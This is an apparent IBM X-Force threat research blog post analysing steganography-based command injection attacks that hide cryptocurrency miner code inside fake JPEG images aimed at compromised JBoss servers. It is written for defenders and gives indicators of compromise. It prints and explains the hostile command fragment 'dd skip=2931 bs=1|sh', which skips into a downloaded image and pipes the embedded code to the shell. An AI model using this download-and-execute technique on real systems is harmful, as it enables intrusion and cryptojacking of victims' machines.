Steganography, or the practice of concealing a file, message, image or video within another file, message, image or video, may be an older technique, but it continues to be an incredibly versatile and effective method for obscuring or hiding information in plain sight. In 2017, IBM X-Force has identified three different malware samples in network attacks containing cryptocurrency CPU-mining tools hidden within fake image files.

In September 2017, IBM X-Force reported a sixfold increase in these types of attacks. The X-Force team identified the use of steganography to hide embedded mining tools via command injection (CMDi) attacks detected by IBM Security’s managed intrusion detection and prevention system (IDPS) service. Cybercriminals continue to use steganography, likely because it is easy to convince users to open images without prompting suspicion.

Below is an analysis of the most prevalent of the three malware samples used in the attacks. Although only one sample is analyzed here, the others resemble it in the way they work. We have included indicators of compromise (IoCs) for all three samples nonetheless.

Hiding in Plain Sight

The most prevalent malware sample in the attack examples analyzed by X-Force uses steganography to hide a malicious image file called fantasy-938617.jpg.

The following URL path is the value detected by the IBM X-Force command injection rule:

Attackers often abuse legitimate services, such as free image hosting services that allow users to post images to different platforms. This can allow the attacker to spread malware from a variety of legitimate sources to multiple users.

The file fantasy-938617.jpg in the URL above is the fake image and the string dd+skip=2931+bs=1|sh that follows it is an instruction for the targeted endpoint/server to convert and execute the malicious code as shell code.

The targeted system in this case is the JBoss application server as identified by the URL path /jexws4/jexws4.jsp. The JavaScript file jexws4.jsp is not native to JBoss software — it’s actually a component of the JexBoss exploit tool. JexBoss is a tool for testing and exploiting Java deserialization vulnerabilities in JBoss application servers. If JexBoss is resident on the target machine, it would indicate that the server is compromised and will allow shell commands to be executed. In this case, the attacker mostly likely scanned for JBoss application servers that had already been compromised and then conducted a CMDi attack.

Now, let’s break down the components of the string dd+skip=2931+bs=1|sh:

  • dd is a Linux tool used for copying and converting files into other formats.
  • skip moves the current pointer of the input stream. The malware author uses skip to force the server to ignore data at the beginning of the input stream and move directly to the embedded malicious code.
  • The image code has a valid image header and the code below it actually displays an image. The image file is transferred to the victim using command line URL (cURL) with instructions to skip to a position in the file where the shell code begins.
  • |sh executes the code that is piped to the system shell according to the schedule set in the crontab.

This is the image displayed to the victim:

Below is a partial capture of the code behind the image:

Below is the beginning of the script and where the skip points to begin execution. The code prior to this script is the .jpg image.

The function DoMiner() represents the start of the code that executes a coin miner malware. After the malware is installed, the victim’s endpoint becomes a slave in a botnet that mines cryptocurrency for a cybercriminal.

Not Steganography’s First Time at the Rodeo

There are many older examples of cybercriminals using steganography to carry out their malicious deeds. The Stegoloader backdoor Trojan, for one, has been plaguing victims for more than five years. In early 2015, the Vawtrak malware used steganography to hide update files in favicons, which are small icon files associated with a particular website or webpage. The Stegano campaign, launched in late December 2016, used steganography to hide malvertising, or malware in banner ads.

More recently, IBM X-Force discovered a small-scale malware campaign involving a Neutrino bot dropping a payload that contained two Zeus malware breeds: Atmos and Zberp. The Zberp Trojan uses steganography to hide its configuration file.

Detecting Malicious Steganography

The delivery mechanism for all three malware samples analyzed was command injection, which was also the catalyst for their detection. However, as indicated earlier, steganography has been used with a variety of delivery methods, and detection of this technique can be tricky since it may not always be possible through network rules alone.

For example, our CMDi rule detected the skip instructions in the samples analyzed; however, network rules wouldn’t detect the code behind the image. Attackers’ use of the steganography toolkit StegoSploit demonstrates the additional need for behavioral analytics. An attacker can use the toolkit to embed malicious code within an image and perform a drive-by download attack to deliver the malware to the victim.

To increase the detection capabilities of malware hiding via steganography, enterprises may want to invest in a malware sandbox that can provide behavior-based analysis and work as part of an integrated security immune system. Integration with network protection and a threat intelligence platform can help analysts keep track of what’s important when it comes to identifying evasive malware.

Sample IoCs

Below are IoCs for each of the malware samples analyzed. Please access our X-Force Exchange collection for additional information.

Filename: logo.jpg

  • MD5: b310fd27ce633c4220b2c832db3a5f79
  • SHA1: f229cb063f546ec02742d3b7e52815b6caa56d2d
  • SHA256: 28452dc29d86bcc21e8a98920484e235ff0e88f42283a16b9b6a9aea75b62366ssdeep
  • File Size: 1.4 KB (1408 bytes)
  • Source IP:

Filename: 58837466f1237.jpg, test123

  • MD5: 08f7eac49ffedc720844338290dab1ec
  • SHA1: 179f62b0a505c889d865e8feff7f59379e4ed885
  • SHA256: 62e0b77235665a15aa44c4b6e0da80b87fad33803a201d18db8871f4abb0d2c2ssdeep
  • 24576:dEX3yP0ghoMApslmzW2B2zMPpoOabQuq0+wn4d8OJjfaMRG:Ctgvu4qyq0+w4fJjfw
  • File Size 1.2 MB (1220610 bytes)
  • File Type: JPEG
  • Source IP:

Filename: fantasy-938617.jpg

  • MD5: 4e13b60a707d1159230b140c9059b9c4
  • SHA1: c67190b1281e7ca606de6dacd7147990398ce2b3
  • SHA256: 6a6a8c0888d9187a6c19c5e12535534990f646e1397b06be4a054c9789a08f3fssdeep
  • 96:ArbWsYZQpswDH+6FrxxjujFYmhQT1OuUZoGQT5VO0s:AyZAsyHPFrzAYZ1ORoVT5E
  • File Size: 5.6 KB (5727 bytes)
  • File Type JPEG
  • Source IP:

Read the complete X-Force research Report: Evading the Malware Sandbox

More from Malware

Kronos Malware Reemerges with Increased Functionality

The Evolution of Kronos Malware The Kronos malware is believed to have originated from the leaked source code of the Zeus malware, which was sold on the Russian underground in 2011. Kronos continued to evolve and a new variant of Kronos emerged in 2014 and was reportedly sold on the darknet for approximately $7,000. Kronos is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims. After remaining…

A View Into Web(View) Attacks in Android

James Kilner contributed to the technical editing of this blog. Nethanella Messer, Segev Fogel, Or Ben Nun and Liran Tiebloom contributed to the blog. Although in the PC realm it is common to see financial malware used in web attacks to commit fraud, in Android-based financial malware this is a new trend. Traditionally, financial malware in Android uses overlay techniques to steal victims’ credentials. In 2022, IBM Security Trusteer researchers discovered a new trend in financial mobile malware that targets…

RansomExx Upgrades to Rust

IBM Security X-Force Threat Researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language, joining a growing trend of ransomware developers switching to the language. Malware written in Rust often benefits from lower AV detection rates (compared to those written in more common languages) and this may have been the primary reason to use the language. For example, the sample analyzed in this report was not detected as malicious in the…

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. Thus, IBM Security research draws another link between the Raspberry Robin infections and the Russia-based cybercriminal group 'Evil Corp,' which is the same…